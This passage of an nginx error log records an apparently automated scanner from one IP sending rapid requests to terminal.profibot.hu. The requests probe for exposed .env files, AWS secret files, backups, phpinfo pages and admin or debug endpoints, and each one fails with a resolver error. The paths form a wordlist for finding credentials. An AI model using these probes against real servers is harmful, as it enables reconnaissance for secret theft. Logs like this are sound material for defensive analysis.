"terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /__debug__ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /__debugbar HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /__tests__/test-become/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /_astro/[chunk-name].[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /_dev HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /_ignition/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /_next/static/chunks/945-34f67d7c0866cf61b970.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /_next/static/chunks/app/%5B...not-found%5D/page-63e952e68a371605.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /_next/static/chunks/app/error.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /_next/static/chunks/app/global-error.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /_next/static/chunks/app/layout-a908fe02173ed4b1.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /_next/static/chunks/framework-[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /_next/static/chunks/main-app-[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /_next/static/chunks/pages/_app-a9fba37d935ce3f3.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /_next/static/chunks/pages/_app-d1b5411bacd03f02.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /_next/static/chunks/pages/_app-d25b242610000153a081.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /_next/static/chunks/webpack-[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /_static/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /a.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /acme-challenge/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /acme/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /acme_challenges/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /actions-server/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /actuator/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /admin-api/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /admin-app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /admin-panel/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /admin.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /admin/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /admin/info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /adminapp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /adminer.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /adminer/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /administrator/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /adminphp.php' HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /agora/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /alpha/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /anaconda/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /apache.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /apache/i.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /apache/info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /apache/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /apache2.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /apc.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api-server/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/.env.back HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/.env.example HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/.env.sample HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/.env.save HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/debug HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/docs/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/internal/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/keys HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/private/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:13 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/src/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/v1/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/v1/debug HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/v2/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /apis/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app-7d66de919618d3830635.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app-order-client/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app.yaml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app/.env.example HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app/.env.sample HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app/.env.save HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app//.env.back HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app/client/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app/code/community/Nosto/Tagging/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app/config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app/config/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app/config/dev/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app/frontend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app/info HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app/info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app1-static/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app2-static/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app_dir/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app_nginx_static_path/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /application/.env.sample HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /application/.env.save HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /apps/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /apps/client/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Archipel/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /asdf.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /asset_img/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /assets/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /assets/index-[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /assets/index-[hash].mjs HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /assets/index-GquDNGwd.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:14 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /assets/js/app.f8ec9fb3.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /assets/js/app.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /assets/vendor-[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Assignment3/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Assignment4/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /audio/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /aws-secret.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /aws.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /aws/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /azure/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /babel-plugin-dotenv/test/fixtures/as-alias/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /babel-plugin-dotenv/test/fixtures/default/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /babel-plugin-dotenv/test/fixtures/dev-env/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /babel-plugin-dotenv/test/fixtures/empty-values/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /babel-plugin-dotenv/test/fixtures/filename/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /babel-plugin-dotenv/test/fixtures/override-value/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /babel-plugin-dotenv/test/fixtures/prod-env/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /back-end/app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /back/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /backend/.env.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /backend/config/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /backend/debug HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /backend/src/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /backendfinaltest/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /backup.tar.gz HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /backup.zip HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /base_dir/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /basic-network/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /bgoldd/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /bitcoind/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /blankon/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /blob/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /blog/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /blogs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:15 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /blue/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /bookchain-client/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Booking/Default.aspx HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /bootstrap/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /boxes/oracle-vagrant-boxes/ContainerRegistry/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /boxes/oracle-vagrant-boxes/Kubernetes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /boxes/oracle-vagrant-boxes/OLCNE/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /bucoffea/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /build.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /build/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /build/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /build/_app/immutable/chunks/[chunk].[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /build/_app/immutable/entry/app.[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /build/entry.client-[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 